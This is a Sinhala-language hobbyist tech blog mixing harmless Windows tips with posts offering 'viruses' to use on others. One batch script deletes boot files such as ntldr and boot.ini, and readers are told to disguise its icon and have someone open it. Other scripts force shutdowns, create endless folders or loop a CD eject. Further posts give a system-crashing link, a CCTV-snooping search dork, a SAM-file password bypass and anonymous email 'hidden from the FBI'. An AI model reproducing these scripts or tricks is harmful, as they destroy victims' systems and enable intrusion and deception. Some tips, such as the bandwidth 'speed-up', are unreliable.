Slide # 1

NEED FOR SPEED RIVALS ® නොමිලේ

මේක Need For Speed ක්‍රීඩා මාලාවේ අලුත්ම එළිදැක්වීම..''RIVALS'' තමයි නම.. මේ ක්‍රීඩාව Action හා Racing කියන කොටසට තමයි අයත් වෙන්නේ Read More

Slide # 2

Desktop එක ලස්සන කරගමු

හැමදාම දකින කුකුලගේ කරමලේ සුදුයි වගේ දැකල දැකලම වින්ඩෝස් 7 වල Default View එක එපා වෙලාද? එහෙනම් පොඩ්ඩක් බැලුවනම් ඔය උඩ තියන පින්තූරය දිහා :D හොදයිද? Read More

Slide # 3

100%ක් INTERNET SPEED එක සුපිරියට වැඩි කරගමු

මම දන්නවා ගොඩක් අය තමන්ගේ අන්තර්ජාල වේගය කොච්චර තිබ්බත් මදි කියලනේ හිතන්නේ Read More

Slide # 4

PEN DRIVE එකෙන් ඕනෑම වින්ඩෝස් එකක් දාමු

ගොඩක් අයට තියන ප්‍රශ්නයක් තමයි වින්ඩෝස් දාන්න CD/DVD අවශ්‍ය එක.. ඔන්න අද කියන්න යන්නේ Pen Drive එකකින් වින්ඩෝස් දාන විදිහයි Read More

Slide # 5

ඔබේ කාමරය WI-FI කලාපයක් කරගන්න

කොහොමද ඔයාගේ කාමරේ Wi-Fi Zone එකක් කරගන්න තියනවනම් නේද? ආව් ආව් කටට ආව හිනාව නේද? ඔව් ඔව් එක තමයි මේ කරන්න හදන්නේ Read More

Showing posts with label විකාර වැඩ. Show all posts
Showing posts with label විකාර වැඩ. Show all posts

Wednesday, March 27, 2013

හැමදාම දකින ෆෙස්බුකිය වෙනස් කරගමු........



හේයි යාලුවනේ  මම ඔයාලට කිව්වනේ ඊයේ උදේම එකෙක්   මාව හැක් කොරන්න දැගලුව කියලා....... ඉතින් මම හිතුව   මුහුණුපොතට පොඩි වෙනසක් කොරන්න 
smiley face lol smiley

හරි වැඩිය වැල් වටාරම් ඕනේ නැහැ කෙලින්ම ගේමට එන්ටර් වේමු.. 

මෙහෙමයි අපේ ෆෙස්බුකියට ලොග් වෙන තැන තියෙනවා නේ. අපිට මේ Extension එකෙන් අපිට ඕනෙම රුපයක් දාල ලොග් ඔන් තිරය වෙනස් කරගන්න පුළුවන්. හැබැයි මේ Extension එක වැඩ කරන්නේ  Google Chrome, Comodo Dragon වගේ සුළු Browser වලට විතරයි එහෙනම් ජය වේවා..... අපි කැපෙනවා  

හුටා මම ලින්කුව දීලා නැහැ නේ
wtf emoticonrunning man lol smileyමට යනකොට මතක් උනේ ඔන්න එහෙනම් බාගනටකෝ
https://chrome.google.com/webstore/detail/fb-refresh/bdlfdaajmclngiomogmleihllaejcnni?hl=en

එහෙනම් දැන්වත් මම යන්නම් නේ වෙන මොකවත් නැහැ නේ අහන්න අහන්න දෙයක් තිබුනෝත් කොමෙන්ටුවක් දාන්නකෝ   
sad bye emoticon


smiley says thank you emoticon
                                                 

Saturday, February 9, 2013

ලොව වටා CCTV හැක් කරමු



ඔන්න ඉතින් තව පොඩි කුප්පියක් අරගෙන ආවා.. පොඩි කුප්පියක් කිව්වට මේකෙත් අමුතුම ගතියක් තියනවා.. මොකෝ කියන්නේ ඕනෑම කෙනෙකුට ලෝකේ වටේ තියන CCTV ගෙදර ඉදන්ම බලන්න පුළුවන් චාන්ස් එකක් දෙනවා කිව්වොත්... ම්ම්ම්ම් එහෙමද ආස.. :D ලොලේ ලොල් කියල එහෙනම් අද කුප්පියෙන් දෙන්න යන්නේ එක එක තැන්වල තියන CCTV වලින් බලන්නේ කොහොමද කියලයි.. ඈ ඈ .. එතකොට ආව හිනාව නේද.. ඇති ඇති පැණි හිනාව.. යාපනේ ඉදලා හම්බන්තොටට පේනවා.. :D හරි එහෙනම් මෙන්න මෙහෙමලු වෙන්නේ හරිද.. මේක වෙන්නේ ඔන්ලයින් හොදද.. නැතුව ඉතින් Live CCTV අහවල් විදිහට බලන්නද නේද ... :D 

බීච් වල, හොටෙල් වල, රෙස්ටෝරන්ට් වල, මහා පාරවල්වල, පාක් වල, නයිට් ක්ලබ් වල(ත් ඇති :D) එහෙම තියන CCTV,LiveCam විවිධ ආරක්ෂක හා වෙනත් හේතු උඩ සජීවීව අන්තර්ජාලයට යොමු කරලා තියනවා.. ඔන්න අපි කොරන්ට හදන්නේ අන්න එව්වට හොම්බ දාන එකයි... අනුන්ගේ එව්වට හොම්බ දාද්දීත් අමුතුම පාට පාට ගතියක් තියනවනේ.. :D එහෙනම් වැඩේ පටන්ගමු නේද ? 

දැනට ඉතින් ලංකාවේ කියල CCTV තියෙන්නේ කොලොම්පුරේ විතරනේ.. තව ඉස්සරහට මුළු ලංකාවේම වැඩ කෑලි ගෙදර ඉදලම බලාගන්න පුළුවන් වේවි..

මෙන්න මෙතන කොටන්න.. Search Result එකින් එක බලන්නකෝ.. එක එක CCTV හම්බ වෙයි..

එහෙම නැතිනම් අපේ සයිබර් දෙයියා ගූගල් ගොයියා වෙතට ගිහින් පහල තියන ටික කොටන්න.. එතකොට එන Result වලින් තියෙන්නේ ඔය කලින් කිව්ව CCTV තමා.. පොඩ්ඩක් කරක් ගහල හොයාගන්න පුළුවන් අවශ්‍ය දේවල්... (මමනම් දන්නේ නෑ මොනවද කියලා) 

මෙන්න තියනවා කොටන්න ඕන ටික..
inurl:view/index:shtml

හරි එහෙනම් ඔන්න ඒ කුප්පියත් ඉවර කළා හොදේ.. ඉතාමත් ඉක්මනට තවත් ආස හිතෙන මේ වගේම එල ලිපියකින් සෙට් වෙමු ඈ..

එහෙනම්..
ඔබට ජය වේවා..!!

Friday, January 25, 2013

FBI එකේ ඇස් වහලා කැමති නමකින් E-Mail යවමුද ?



ඔන්න ඉතින් අදනම් පරිගණක අත්වැල බ්ලොගය කරන මට, ඒ කියන්නේ SKට බොහොම සතුටු දවසක් කියමුකෝ... මොකද එහෙන් මෙහෙන් හොරට විසිටර්ස්ලා ගෙන්නගෙන අපිවම රවට්ටගන්නේ නැතුව අපේ බ්ලොග් එකේ Traffic එක 10000 පැන්නා.. ඉතින් බ්ලොග් එකක මේ වගේ අවස්ථාවක සතුට 100% දැනෙන්නේ තවත් බ්ලොගයක් කරන කෙනෙකුටම තමා.. ඔන්න අපිත් එක්ක මෙච්චර කාලයක් එකට හිටිය හැමෝටම ගොඩක්ම ගොඩාක් ස්තුතියි කියනවා බොක්කෙන්ම.. ඒ වගේම ඉස්සරහටත් අපිත් එක්කම ඉන්න කියලා සාදරයෙන් ඉල්ලනවා..  

එහෙනම් කුප්පිය අදුරගමු නේද? අද කියල දෙන්න යන්නේ හොරාට E-Mail යවන විදිහ.. ක්‍රම දෙකකින්ම කියල දෙනවා.. මේ දෙකේ තියන විශේෂය තමා FBI එකට මාට්ටු නොවෙන විශ්වාසවන්තම අඩවි දෙක වීම... 

කෙටියෙන්ම කිව්වොත් මේකට කියන්නේ Anonymous E-Mail කියලා. මේකෙන් ඉතින් පුළුවන් තමන්ට ඕනා කෙනෙකුට ඔයාගේ E-Mail Address එක හොයාගන්න බැරිවෙන්න E-Mail යවන්න.. ඒ වගේම ඔයාල කැමති නමක් දාලා යවන්නත් පුළුවන්....

අපි එහෙනම් පිළිවෙලට බලමු නේද මොනවද මේ අඩවි.. ඒ වගේම කරන්නේ කොහොමද කියලා එහෙම...

1. DEADFAKE

මෙන්න පහල තියනවා Screenshot එකක්... එක බැලුවහම තේරෙයි...



2. ANONYMAILER

මෙන්න එකෙත් Screenshot එකක් තියනවා.. බලන්නකෝ හරිම ලේසි වැඩේ.. 




කොහොමද වැඩේ එල නේද? එහෙනම් ඔන්න අපි කැපුනා... ආයෙත් එල කුප්පියකින් සෙට් වෙමු .... එතකල් අපිත් එක්කම ඉන්න හොදේ... 

එහෙනම්..!!
ඔබට ජය වේවා..!!

Monday, December 31, 2012

හැමදෙනාම දැනගතයුතු Run Command 21ක්



ඔන්න තවත් කුප්පි කෑල්ලක් අතාරින්න තමයි හදන්නේ... 
අපි හැමෝම ඉතින් කෑලි හතරේ කොම්පියුටරේ වැඩ කෑලි එහෙම දන්නවනේ.. ඒත් දන්නවද පරිගණක පාවිච්චි කරන හැමකෙනෙක්ම අනිවාර්යෙන්ම දැනගතයුතු Run විධාන තියනවා කියලා.. අද කුප්පියෙන් ඒ ගැන තමයි කතාව ඈ.. Run විධාන කිව්වම ඉතින් නොසෑහෙන්න තියනවනේ නේද? ඒත් සමීක්ෂණ වලින් හෙළිවෙලා තියනවා පරිගණක පාවිච්චි කරන අයගෙන් 0.5%ක් වත් මේ විධාන දන්නේ අදුරන්නේ නැහැ කියලා.. ඒ 0.5% සෙට් එකට ඇතුලත් වෙනවා කියන එක අමු චාටර් නේද?  එහෙනම් මේකයි කතාන්දරේ... මේ විධාන වලිනුත් අත්‍යාවශ්‍යම විධාන 21ක් හදුනාගෙන තියනවා.. අපි ඒ ටික මොනවද කියලා බලමු..

දන්නා අය මේක නොදැක්ක ගානට ඉන්න. නොදන්නා අය මේක බලලා අර 0.5% සෙට් එකෙන් අයින් වෙන්න :D


1) compmgmt.msc - for computer managent
2) devmgmt.msc - device manager
3) regedit - registry editor
4) msconfig - system configuratn utility . . .
5) compmgmt.msc - Computer management
6) devmgmt.msc - Device manager
7) diskmgmt.msc - Disk management
8) dfrg.msc - Disk defrag
9) eventvwr.msc - Event viewer
10) fsmgmt.msc - Shared folders
11) gpedit.msc - Group policies
12) lusrmgr.msc - Local users and groups
13) perfmon.msc - Performance monitor
14) rsop.msc - Resultant set of policies
15) secpol.msc - Local security settings
16) services.msc - Various Services
17) msinfo32 - System Information
18) sysedit - System Edit
19) win.ini - windows loading information(also system.ini)
20) winver _ Shows current version of windows
21) calc - calculator

හොදා නේද අද කුප්පිය.... එහෙනම් ආයෙත් එල කුප්පියකින් සෙට් වෙමු ඈ... ඔන්න මම කැපුනා..

එහෙනම්..
ඔබට ජය වේවා..!!

තවත් අලුත් වයිරස් හදන ක්‍රම දෙකක්


ඔන්න ඉතින් තවත් කුප්පියක් දෙන්නයි සූදානම.. අද දෙන්න හදන්නේ තවත් වයිරස් හදන ක්‍රම දෙකක්. මම මීට කලිනුත් ලිපි දෙකක් දුන්නනේ මෙව්වා ගැන නේද?  අද ඔන්න තවත් එකක් දාන්න හදන්නේ.. 

එහෙනම් කෙලින්ම වැඩේට බහිමු නේද?


TRY AT YOUR OWN RISK

1.පරිගණකයක් Shut Down කරවමු.

wx@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s


ඔන්න ඔය ටික Notepad එකක ටයිප් කරන්න. ඔය I don't like you කියලා තියන ටික වෙනුවට ඔයාලට අවශ්‍ය දෙයක් ටයිප් කරන්න. එතකොට ඕක ඕපන් කලාම ඒ මැසේජ් එක වැටිලා එකපාරටම පරිගණකය Off වෙනවා. ඒ කියන්නේ Force Shutdown එකක්. ඔය ෆයිල් එක සේව් කරගන්න ඕනා අන්තිමට .BAT කියලා දීලා.
උදා:-Athwela.BAT

2.නොනවත්වා Notepad එක ඕපන් කරවමු

@ECHO off
:top
START %SystemRoot%\system32
notepad.exe
GOTO top 


ඔය ටිකත් අර කලින් වගේම Notepad එකක ටයිප් කරලා .BAT කියලා සේව් කරන්නයි තියෙන්නේ.

හරි එහෙනම් ඒ කුප්පියත් මේ විදිහට නිමා වූ වගයි කියන්නේ.. තව ඉස්සරහට හොද හොද වැඩ කෑලි දාන්නම්කො... ඔක්කොම එකට දැම්මොත් අගයකුත් නෑ කියනවනේ නේද?

ආයෙත් මේ වගේම කුප්පියකින් හම්බවෙමු..

එහෙනම්..
ඔබට ජය වේවා..!!

කොම්පියුටරයේ වෙලාව සිංහලෙන් බලමුද? [Taskbar]


වැඩේ තේරෙනවා නේද ඔය පින්තූරය දැක්කම. හරි මේකයි කරන්නේ.
සාමාන්‍යයෙන් ටාස්ක්බාර් එකේ වෙලාව තියෙන්නේ AM/PM විදිහටනේ.. කොහොමද ඉතින් උදේ/ සවස කියල වගේ දැම්මම තියනවා  නේද අමුතු ගැම්මක්. එහෙනම් අද කුප්පියෙන් ඒ ගැම්ම ගමු නේ.. 

හරි එහෙනම් මෙන්න මෙහෙමයි වැඩේ වෙන්නේ...

වින්ඩෝස් XP/ වින්ඩෝස් 7/ වින්ඩෝස් 8 කියන ඔක්කොගෙම කරන්න තියෙන්නේ එකම විදිහටයි. එක නිසා කිසිම කොස්සකුත් නැහැ.. විනාඩියේ දෙකේ කේස් එකක් තියෙන්නේ ඒක නිසා බයවෙන්න දේකුත් නැහැ.. :D 

හරි එහෙනම් වැඩේ බලමු නේද? මම මේක වින්ඩෝස් 8 එකේ කරන විදිහ පෙන්නන්නම්. අනිත් වින්ඩෝස් වලනම් මේ වගේවත් අමාරු නැහැනේ... හරි එහෙනම් මෙන්න කරන විදිහ..

1. Control Panel යන්න.



2. Region ගිහින් Additional Setttings  යන්න.



3. දැන් Time ටැබ් එකට ගිහින් AM symbol/ PM symbol කියන දෙකට උදේ සවස කියලා දෙන්න.. ඕනනම් තමන්ට ඕන නමකුත් දෙන්න පුළුවන් ;) "සිංහල නැත්තම් මෙතනින් ගන්න"




හරි එහෙනම් වැඩේ ඉවරයි ඔන්න.. ආයෙත් කුප්පියකින් සෙට් වෙමු කියල SK කැපුනා එහෙනම් ඈ..

එහෙනම්..
ඔබට ජය වේවා..!!

Tuesday, December 18, 2012

Hack කරන එක රිදෙන්නම කරමු



මුලින්ම කියන්නම් මේ ලිපිය මම දෙන්නේ එක්කෙනෙක් මට දුන්න කින්ඩි ටෝක් එකකට රිප්ලයි විදිහට.. මිනිහා මට වයිරස් ගැන උගන්නන්න එනවා. හරි හරි.. කෝන්තර ඉවරයි.. වැඩේ පට්ටාන් ගම්මු..

                       "DO AT YOUR OWN RISK"

ඔක්කොටම කලින් දැක්ක නේද ඔය දිලිසි දිලිසි රතු අකුරින් තියන එක. හරි හරි එහෙනම් වැඩේ මෙහෙමයි. අද දෙනවා සුපිරි වයිරස් 3ක්. ඒකත් දෙන එක රිදෙන්නම දෙනවා.


1. URL එකකින් සිස්ටම් එක Crash කරමු.

මෙච්චරයි මේකේ කතාවනම්. පහල තියන URL එක ක්ලික් කළා කියන්නේ ටොපිය කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බබා හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික් කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු. ලින්ක් එක තවමනම් වැඩ කරනවා. අනාගතය ගැනනම් කියන්න දන්නේ නැහැ. ඔයාලගේ ආරක්ෂාව සදහා ලින්ක් එක නිකන් Text එකක් විදිහටයි දාල තියෙන්නේ.

http://tiny.cc/ibJUN


2. පරිගණකයක් සදහටම නිදි කරවමු

මේකෙත් පොඩි කුප්පියක් තියෙන්නේ. ඒත් වෙන වැඩේනම් පොඩි නැහැ. මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.
උදා:- Athwela.bat
ඔන්න ඔය වගේ. මෙන්න පහල තියනවා කෝඩ් එක.



@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම කොහොමද දැනෙන සනීපෙ.. තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.

සැ.යු.- මේ ෆයිල් එක Open කරලා වැඩේ උනාට පස්සේ Recovery කරන්නත් බැහැ හොදද..


3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු

මේකෙදි කරන්න තියෙන්නේ ඔය දෙවෙනි එකේ කරපු ටිකමයි. කෝඩ් එක විතරයි වෙනස්. ආහ්හ්හ්.. මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..

@echo off
:top
md %random%
goto top 

එහෙනම් අදට කුප්පිය ඉවරයි... තව ඉස්සරහට මේ වගේ දේවල් දෙන්නම්කො..

එහෙනම්..
ඔබට ජය වේවා..!!

Monday, December 17, 2012

ජොලියට Virus එකක් හදමුද?



මේක පොඩි සොමි වැඩක්. කෙටියෙන්ම කිව්වොත් හුදෙක් ජොලියට පමණයි. අනිත් එක තමයි බය නැතුව උත්සහ කරලා බලන්න මම මේක කරලා බලල තමයි මේ පෝස්ට් එක දාන්නේ.. කිසිම රිස්ක් එකක් නැහැ. මේකෙන් කරන්නේ නොනවත්වා CD/DVD Rom Drive එක එලියට එන එකයි. මෙහෙමයි වැඩේ වෙන්නේ. පහල තියන Text ටික Notepad එකක පේස්ට් කරගන්න.


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


ඊට පස්සේ සේව් කරගන්න මොකක්හරි නමක් දීල අන්තිමට .vbs කියලා දෙන්න.
උදා:- Athwela.vbs
අන්න ඒ වගේ..

ඊට පස්සේ ඒක ඕපන් කරන්න. වැඩේ වෙනවා නේද? සොමියක් ගන්න පුළුවන් වැඩක් නේද? යාලුවෙක්ට එහෙම මේක කලාම අම්මෝ දැනෙන සනීපෙ නේද? හොදයි දැන් ඕක කළා වගේ නෙමෙයි නවත්තන්නත් දැනගෙන ඉන්න ඕනනේ..

මෙහෙමයි නවත්තන්නේ..
එක්කෝ Close කරන්න. ඒක හරියන්නේ නැත්තම් විතරක්..
Alt+Ctrl+Delete යතුරු ඔබලා Task Manager එක ගන්න.
දැන් Process ටැබ් එකට යන්න.
එකේ ඇති wscript.vbs කියලා.
ඒක ක්ලික් කරලා End Process දෙන්න.

වැඩේ හරි නේද? 
එහෙනම්..
ඔබට ජය වේවා..!!

Wednesday, December 5, 2012

Mouse එක නැතුව Mouse Pointer එක වැඩ කරවමුද



දැන් ටයිටල් එක දැක්ක ගමන් හිතනවා ඇති මේකනම් ටිකක් වෙලා යන අමාරු වැඩක්ද දන්නේ නැහැ කියල.. මේකට යයි ඕනනම් තත්පරයක් නැත්තම් දෙකක්. මේකේ වටිනාකම මේකයි.. හදිස්සියේ වටිනා වැඩක් කර කර ඉන්නවා.. හුටා මවුස් එක හිරවෙනවා... වැඩ කරන්නේ නැතුව යනවා මවුස් එක.. මල කෙලියයි නේද? දැන් ඉතින් මවුස් හොයපන්කෝ.. නෑ නෑ එච්චර දුක් විදින්න දෙයක් නැහැ..  මෙන්න තියනවා කොරමේ... 

මේ පහල තියන කීස් ටික එකවර ඔබන්න.
"Left Shift+Alt+Num Lock"
එතකොට මේ පහල වගේ ඩයලොග් බොක්ස් එකක් එයි. ඒක yes කරන්න..


Spacebar එකෙන්හරි Enter එකෙන්හරි පුළුවන්නේ....

දැන් ඉතින් මවුස් එකේ වැඩේ කරන්නේ කීබෝඩ් ඒක..
මෙන්න තියනවා මූව් වෙන කීස් ටික..
මෙව්වා Numeric Pad එකේ කීස් හොදද..

7    8    9
4          6
1    2    3

ක්ලික් කරන්න ඕනනම් 5 ඔබන්න.
මේකෙන් අයින් වෙන්න ආයෙත් අර කලින් කළා වගේ
"Left Shift+Alt+Num Lock" ඔබන්න..
වැඩේ වටිනාකමක් තියනවා නේද?
එහෙනම් ආයෙත් මේ වගේම කුප්පියකින් හම්බවෙමු..

එහෙනම් ඔන්න අපි ගියා..
ඔබට ජය වේවා..

Password කඩමු



කම්පියුටර් එකේ ඇඩ්මින් පාස්වර්ඩ් ඒක අමතක වුනාද? නැත්තම් ගෙදර හරි නැත්තම් කාගෙහරි වෙන PC එකක් තියනවා එකේ පාස්වර්ඩ් දාල ඒක ඇරගන්න බැරිද? ( ආතල් එකට හා දැනුමට පමණි. චා වැඩ වලටනම් නෙමෙයි හොදද ) එහෙනම් මෙන්න මේක තමා ඔයාට කරන්න තියෙන්නේ.. පොඩි සිම්පල් කේස් එකක් තියෙන්නේ.

ක්‍රම දෙකක් තියනවා..

ක්‍රමය 1 

1. මැෂින් ඒක DOS වලින් ඔන් කරගන්න.
2.ඊට පස්සේ වින්ඩෝස් තියන හාඩ් ඩ්‍රයිව් එකේ windows/system32/config පාත් එකෙන් ගිහින් sam.exe සහ sam.log කියන ෆයිල් දෙක මකලා දාන්න.

3.හරි දැන් DOS වලින් අයින් වෙලා වින්ඩෝස් වලින් මැෂින් ඒක Restart කරන්න.
4.හෑ... දැන් ඇඩ්මින් එකවුන්ට් එකේ පාස්වර්ඩ් එකක් නෑ නේද?
එල එල........
(සැ.යු- මෙය සාර්ථක වන්නේ හාඩ් ඩ්‍රයිව් එකේ ෆෝමැට් ඒක FATනම්  පමණි. එසේ නැත්නම් දෙවන ක්‍රමයට යන්න.)

ක්‍රමය 2 

1.සිස්ටම් එක තියන හාඩ් ඩ්‍රයිව් එක ගලවලා වෙන කම්පියුටර් එකකට සවි කරන්න.
2.ඒක Secondry හාඩ් ඩිස්ක් එක විදිහට හදලා කම්පියුටර් එක බූට් කරන්න. (Primary විදිහටනම් බූට් කරන්න එපා)
3.දැන් අපිට පාස්වර්ඩ් ඒක කඩන්න ඕනා හාඩ් ඩිස්ක් එකේ මේ ලොකේෂන් එකට යන්න.
"windows/system32/config"
4.ඕක ඇතුලේ තියන SAM.exe හා SAM.log කියන ෆයිල් දෙක මකලා දාන්න.
5.දැන් හාඩ් ඩිස්ක් එක ගලවලා මුලින් තිබ්බ මැෂින් එකටම ගහන්න (Primary විදිහට)
6.දැන් බලන්න එහෙනම් මැෂින් එක පොඩ්ඩක් ඔන් කරලා බලමුකෝ...
පාස්වර්ඩ් එකක් අහන්නෙවත් නැහැ නේද දැන්..


එහෙනම්..
ඔබට ජය වේවා..!!

Tuesday, December 4, 2012

100%ක් Internet Speed එක සුපිරියට වැඩි කරගමු



මේකනම් සුප්පා වැඩක්. මම නිදාගන්න ගිහින් ඉද්දි මතක් වුන ගමන් තමයි ආයෙත් ඇහැරලා ඇවිත් මේ පෝස්ට් ඒක මේ ලියන්නේ.. 
මම දන්නවා ගොඩක් අය තමන්ගේ අන්තර්ජාල වේගය කොච්චර තිබ්බත් මදි කියලනේ හිතන්නේ. ඔයාලට කිව්වට මොකෝ 15.9MB/s තිබිලත් මට මදි කියල හිතෙනවනෙ. මොනවා කරන්නද ඕක ඉතින් අපේ හැටිනේ.. මමනම් සෙල්ලම දාල තියෙන්නේ.. දැන් මගේ අන්තර්ජාල පිරික්සුම් වේගය තිබ්බට වඩා හුගාක් වැඩි.. ඔයාල හැමෝම දන්නා දෙයක්නේ මේ SK ඉතින් තනියම කන කෙනෙක් නෙමෙයි කියලා.. ඔන්න ඉතින් මැද්දෙන් පණ්ඩිත වැකියකුත් දාල නේද? හික් හික්.. හරි හරි ඔන්න එහෙනම් වැඩේට බහිමු කෝලම් කරන ඒක නවත්තල.. 

කොටින්ම මමත් පුදුම වුනා මේ වැඩේ කලාට පස්සේ.. මම හිතනවා ඔයාලටත් මගේ ප්‍රතිපලයම හම්බවෙයි කියලා... එහෙනම් දෙයියෝ බුදුන් සිහිකරලා වැඩේ පට්ටාන් ගම්මු... ගුඩ් ලක්...

1.ඉස්සෙල්ලම ස්ටාට් ගිහින් gpedit.msc කියලා ටයිප් කරලා Local Group Policy Editor ඒක ගන්න..

2.දැන් ඒකෙ තියන වම් පැත්තේ මෙනුවෙන් Computer Configuration යටතේ තියන Administrative Templetes ක්ලික් කරන්න.

3.දැන් Network ක්ලික් කරන්න. ඒක යටතේ ආව ලිස්ට් එකෙන් Q0S Packet Scheduler කියන ඒක උඩ ඩබල් ක්ලික් කරන්න. පහල තියනවා ඔන්න බලන්නකෝ....



4.ඕක උඩ ඩබල් ක්ලික් කරහම එන ලිස්ට් එකෙන් Limit Reservable Bandwidth කියන එක උඩ ඩබල් ක්ලික් කරන්න.. දැන් මෙන්න මෙහෙම එකක් එයි..



5.දැන් ඔතන Not Configured කියලා තියන ඒක Enabled කියන එකට මාරු කරලා පහල Options වල 80%ක් විදිහට තියන Bandwidth Limit ඒක 0 ටම අඩු කරන්න. දැන් තේරෙනවා නේද කොච්චර වේගයක් කකාද ඉදල තියෙන්නේ කියලා කම්පියුටර් ඒක.. 

6.හරි එහෙනම් දැන් Apply කරලා OK කරන්න. ඊට පස්සේ කම්පියුටර් ඒක Restart කරන්න. පොඩ්ඩක් දැන් බලන්නකෝ එහෙනම් Internet Surfing Speed ඒක එහෙම.. පට්ට නේද? 

තවත් සාර්ථක ප්‍රතිපල සදහා හොද ඇන්ටිවයිරස් සොෆ්ට්වෙයාර් එකකින් ස්කෑන් පාරකුත් දාල, C Cleaner වගේ එකකින් හාඩ් ඩිස්ක් වල Error, Junks වගේ එව්වා තියනවනම් එව්වා ටිකත් හරිගස්සගත්තනම් ඉතින් වැඩේ සුප්පා නෙමෙයි සුප්පගේ අයියා වගේ තමයි.. 

ඔන්න එහෙනම් ඒ කුප්පියත් ඉවරයි... දැන්වත් නිදාගන්න ඕන එහෙනම්..
ඔබට ජය වේවා..!!

Saturday, November 24, 2012

ඇගිලි වලින් දුම් දාන මැජික් එක කරමු



හැමදාම එක එක වැඩ කෑලි ගෙන්නේ කම්පියුටර් වගේ දේවල් ගැන නිසා අද පොඩි වෙනසකටත් එක්ක මැජික් ට්‍රික් එකක් කියල දෙන්න හදන්නේ. රූපේ දැක්කම වැඩේනම් තේරෙනවා ඇතිනේ නේද ? හරි එහෙනම් මෙන්න වැඩේ කරන සිට්ටම් එක.. :D

මේකට ඕන කරනවා...

1.ගිනි පෙට්ටියක්
2.කූල් වතුර එන ටැප් එකක්.(නැහැ කියලා ප්‍රශ්නයක් නැහැ)

කූල් වතුර එන ටැප් එකක් නැත්තම් මේ පහල තියන එව්වා ටික ඕනා..
1.පොඩි බාජනයක්
2.ඒ බාජනය වැහෙන්න උඩින් තියන්න පුළුවන් තහඩුවක්

ඔන්න එහෙනම් වැඩේ කරමු. ඉස්සෙල්ලම ගිනි පෙට්ටිය දෙපැත්තේ තියන අර ගිනිකුරු ගහන කොටස ගලවලා ගන්නකො. දැන් ඒ කෑල්ල දෙකට නමල අර වෙඩි බෙහෙත් වගේ තියන පැත්ත පහලට හිටින විදිහට ටැප් එක උඩින් තියන්න. ටැප් එක නැති අය අර බාජනයට කූල් වතුර පුරවලා. තහඩුවෙන් වහන්න. වහලා විනාඩි 5ක් විතර තියලා වැඩේ කරන්න පටන් ගන්න. දැන් ටැප් එක තියන අය වතුර ඇරලා අර ගිනිපෙට්ටියෙන් ගලවගත්ත කෑල්ල අවුලගන්න. බාජනයෙන් වැඩේ කරන අයත් අර තහඩුව උඩ ඒ විදිහට ගිනිපෙට්ටි කෑල්ල තියලා අවුලගන්න. පහල රූපය බලන්න.


හොදට ඇවිලිලා නිවුනාට පස්සේ බලන්න ටැප් එකේ, එහෙම නැත්තම් තහඩුවේ කහ පාට කුඩු වගයක් වගේ බැදිලා ඇති. දැන් ඒක ඇගිල්ලෙන් අරගන්න. දැන් ඒ කුඩු ටික ඇගිලි වල තියලා හොදට අතුල්ලලා බලන්නකෝ.. අනේ දුම දානවා නේද? මේකත් මතක තියාගන්න. වැඩේ ඉවර වුනාට පස්සේ අත් දෙක හොදට හෝදගන්න. වැඩේ එල නේද? ඔන්න වැඩේ හරි මෙන්න අපි ගියා..

එහෙනම්..
ඔබට ජය වේවා..!!